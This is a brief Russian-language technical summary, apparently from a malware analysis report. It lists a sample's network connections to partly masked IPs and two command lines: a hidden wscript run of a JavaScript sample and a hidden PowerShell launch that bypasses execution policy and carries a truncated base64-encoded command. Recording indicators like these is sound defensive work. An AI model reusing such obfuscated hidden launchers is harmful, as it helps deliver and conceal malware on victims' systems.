Техническая информация
- <SYSTEM32>\dwm.exe
- '10#.#72.45.9':80
- '10#.#72.45.8':80
- '<DNS_SERVER>':53
- '<SYSTEM32>\wscript.exe' "<PATH_SAMPLE>.js" Gerusia disillusionizingMetalist theomachy cneorumUnderguardian (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABzAHAAaQBuAGQAbABlAHcAbwBvAGQAIAA9ACAAIgBNAGkAZABwAGkAdAAiADsAJABDAGgAcgBpAHMAdABlAG4AIAA9ACAAIgBhAEEAQgAwAEEAS... (со скрытым окном)